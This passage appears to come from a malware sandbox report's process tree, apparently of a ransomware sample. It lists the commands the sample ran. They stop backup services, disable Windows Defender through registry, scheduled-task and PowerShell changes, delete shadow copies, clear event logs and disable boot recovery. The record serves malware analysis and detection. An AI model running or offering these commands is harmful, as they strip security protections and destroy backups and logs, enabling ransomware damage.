- Suspicious use of WriteProcessMemory
PID:1788 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SstpSvc" /y3⤵PID:2936
-
-
-
C:\Windows\SYSTEM32\net.exenet.exe stop "UI0Detect" /y2⤵
- Suspicious use of WriteProcessMemory
PID:692 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "UI0Detect" /y3⤵PID:4052
-
-
-
C:\Windows\SYSTEM32\net.exenet.exe stop "vmicvss" /y2⤵
- Suspicious use of WriteProcessMemory
PID:3648 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "vmicvss" /y3⤵PID:3148
-
-
-
C:\Windows\SYSTEM32\net.exenet.exe stop "VSS" /y2⤵
- Suspicious use of WriteProcessMemory
PID:3496 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VSS" /y3⤵PID:3772
-
-
-
C:\Windows\SYSTEM32\net.exenet.exe stop "wbengine" /y2⤵
- Suspicious use of WriteProcessMemory
PID:3764 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "wbengine" /y3⤵PID:2588
-
-
-
C:\Windows\SYSTEM32\net.exenet.exe stop "WebClient" /y2⤵
- Suspicious use of WriteProcessMemory
PID:2016 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "WebClient" /y3⤵PID:2060
-
-
-
C:\Windows\SYSTEM32\net.exenet.exe stop "UnistoreSvc_1372d" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1976 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "UnistoreSvc_1372d" /y3⤵PID:604
-
-
-
C:\Windows\SYSTEM32\sc.exesc.exe config "SamSs" start= disabled2⤵PID:1736
-
-
C:\Windows\SYSTEM32\sc.exesc.exe config "SDRSVC" start= disabled2⤵PID:712
-
-
C:\Windows\SYSTEM32\sc.exesc.exe config "SstpSvc" start= disabled2⤵PID:1872
-
-
C:\Windows\SYSTEM32\sc.exesc.exe config "UI0Detect" start= disabled2⤵PID:3812
-
-
C:\Windows\SYSTEM32\sc.exesc.exe config "vmicvss" start= disabled2⤵PID:3936
-
-
C:\Windows\SYSTEM32\sc.exesc.exe config "VSS" start= disabled2⤵PID:2440
-
-
C:\Windows\SYSTEM32\sc.exesc.exe config "wbengine" start= disabled2⤵PID:2192
-
-
C:\Windows\SYSTEM32\sc.exesc.exe config "WebClient" start= disabled2⤵PID:2524
-
-
C:\Windows\SYSTEM32\sc.exesc.exe config "UnistoreSvc_1372d" start= disabled2⤵PID:2328
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1996
-
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f2⤵PID:3004
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f2⤵PID:2228
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f2⤵PID:2924
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f2⤵PID:2932
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f2⤵PID:60
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f2⤵PID:1440
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f2⤵PID:1744
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f2⤵PID:2396
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f2⤵PID:2224
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f2⤵PID:3996
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f2⤵PID:3124
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f2⤵PID:4032
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f2⤵PID:1164
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵PID:2088
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵PID:3696
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable2⤵PID:620
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable2⤵PID:1916
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable2⤵PID:3772
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable2⤵PID:1480
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable2⤵PID:1532
-
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f2⤵PID:2056
-
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f2⤵PID:3296
-
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f2⤵PID:364
-
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f2⤵PID:1732
-
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f2⤵PID:3824
-
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f2⤵PID:1652
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:820
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1284
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1684
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:2164
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:752
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:4076
-
-
C:\Windows\SYSTEM32\vssadmin.exevssadmin.exe delete shadows /all /quiet2⤵
- Interacts with shadow copies
PID:3924
-
-
C:\Windows\SYSTEM32\wevtutil.exewevtutil.exe cl system2⤵
- Suspicious use of AdjustPrivilegeToken
PID:832
-
-
C:\Windows\SYSTEM32\wevtutil.exewevtutil.exe cl security2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3340
-
-
C:\Windows\SYSTEM32\wevtutil.exewevtutil.exe cl application2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2128
-
-
C:\Windows\System32\Wbem\wmic.exewmic.exe SHADOWCOPY /nointeractive2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2508
-
-
C:\Windows\System32\Wbem\wmic.exewmic.exe shadowcopy delete2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1104
-
-
C:\Windows\SYSTEM32\bcdedit.exebcdedit.exe /set {default} bootstatuspolicy ignoreallfailures2⤵
- Modifies boot configuration data using bcdedit
PID:320
-
-
C:\Windows\SYSTEM32\bcdedit.exebcdedit.exe /set {default} recoveryenabled no2⤵
- Modifies boot configuration data using bcdedit
PID:3868
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All2⤵PID:1880
-
C:\Program Files\Windows Defender\MpCmdRun.exe"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All3⤵
- Deletes Windows Defender Definitions
PID:296
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true2⤵PID:648
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIOAVProtection $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:1896
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true2⤵PID:1864
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableRealtimeMonitoring $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:1216
-
-